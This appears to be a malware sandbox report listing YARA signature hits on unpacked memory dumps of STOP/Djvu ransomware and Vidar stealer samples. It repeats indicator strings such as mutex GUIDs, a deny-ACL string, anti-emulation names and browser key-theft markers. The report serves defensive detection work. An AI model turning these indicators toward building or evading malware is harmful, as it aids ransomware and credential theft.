11.0.Q5W0I0pzFI.exe.400000.5.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
11.0.Q5W0I0pzFI.exe.400000.5.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.0.Q5W0I0pzFI.exe.400000.5.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.0.Q5W0I0pzFI.exe.400000.5.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
8.0.Q5W0I0pzFI.exe.400000.5.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.0.Q5W0I0pzFI.exe.400000.5.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
6.2.Q5W0I0pzFI.exe.21515a0.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xdf7ea:$s1: http:// 0xfd898:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101b2b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xffa26:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xdf7ea:$f1: http://
6.2.Q5W0I0pzFI.exe.21515a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
6.2.Q5W0I0pzFI.exe.21515a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.0.Q5W0I0pzFI.exe.400000.5.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
17.0.Q5W0I0pzFI.exe.400000.5.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.0.Q5W0I0pzFI.exe.400000.5.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
2.0.Q5W0I0pzFI.exe.400000.8.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
2.0.Q5W0I0pzFI.exe.400000.8.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.0.Q5W0I0pzFI.exe.400000.8.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
16.0.build2.exe.400000.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.0.build2.exe.400000.8.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
16.0.build2.exe.400000.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x92dbc:$s1: JohnDoe 0x92db4:$s2: HAL9TH
16.0.build2.exe.400000.8.raw.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x970c0:$s1: "os_crypt":{"encrypted_key":" 0x9c9ec:$s2: screenshot.jpg 0x92edc:$s3: Content-Disposition: form-data; name="
8.0.Q5W0I0pzFI.exe.400000.9.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
8.0.Q5W0I0pzFI.exe.400000.9.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.0.Q5W0I0pzFI.exe.400000.9.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.0.Q5W0I0pzFI.exe.400000.8.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
9.0.Q5W0I0pzFI.exe.400000.8.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.0.Q5W0I0pzFI.exe.400000.8.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
11.0.Q5W0I0pzFI.exe.400000.8.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
11.0.Q5W0I0pzFI.exe.400000.8.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.0.Q5W0I0pzFI.exe.400000.8.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.0.Q5W0I0pzFI.exe.400000.10.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
9.0.Q5W0I0pzFI.exe.400000.10.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.0.Q5W0I0pzFI.exe.400000.10.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
15.2.Q5W0I0pzFI.exe.22215a0.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xdf7ea:$s1: http:// 0xfd898:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101b2b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xffa26:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xdf7ea:$f1: http://
15.2.Q5W0I0pzFI.exe.22215a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
15.2.Q5W0I0pzFI.exe.22215a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
16.2.build2.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.build2.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
16.2.build2.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x919bc:$s1: JohnDoe 0x919b4:$s2: HAL9TH
16.2.build2.exe.400000.0.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x95cc0:$s1: "os_crypt":{"encrypted_key":" 0x9b5ec:$s2: screenshot.jpg 0x91adc:$s3: Content-Disposition: form-data; name="
2.2.Q5W0I0pzFI.exe.400000.0.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
2.2.Q5W0I0pzFI.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.2.Q5W0I0pzFI.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
2.2.Q5W0I0pzFI.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
2.2.Q5W0I0pzFI.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.2.Q5W0I0pzFI.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
16.0.build2.exe.400000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.0.build2.exe.400000.7.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
16.0.build2.exe.400000.7.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x919bc:$s1: JohnDoe 0x919b4:$s2: HAL9TH
16.0.build2.exe.400000.7.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x95cc0:$s1: "os_crypt":{"encrypted_key":" 0x9b5ec:$s2: screenshot.jpg 0x91adc:$s3: Content-Disposition: form-data; name="
17.2.Q5W0I0pzFI.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
17.2.Q5W0I0pzFI.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.2.Q5W0I0pzFI.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.0.Q5W0I0pzFI.exe.400000.7.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
8.0.Q5W0I0pzFI.exe.400000.7.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.0.Q5W0I0pzFI.exe.400000.7.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
16.0.build2.exe.400000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.0.build2.exe.400000.6.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
16.0.build2.exe.400000.6.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x919bc:$s1: JohnDoe 0x919b4:$s2: HAL9TH
16.0.build2.exe.400000.6.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x95cc0:$s1: "os_crypt":{"encrypted_key":" 0x9b5ec:$s2: screenshot.jpg 0x91adc:$s3: Content-Disposition: form-data; name="
11.0.Q5W0I0pzFI.exe.400000.7.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
11.0.Q5W0I0pzFI.exe.400000.7.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.0.Q5W0I0pzFI.exe.400000.7.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.0.Q5W0I0pzFI.exe.400000.4.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
17.0.Q5W0I0pzFI.exe.400000.4.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.0.Q5W0I0pzFI.exe.400000.4.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
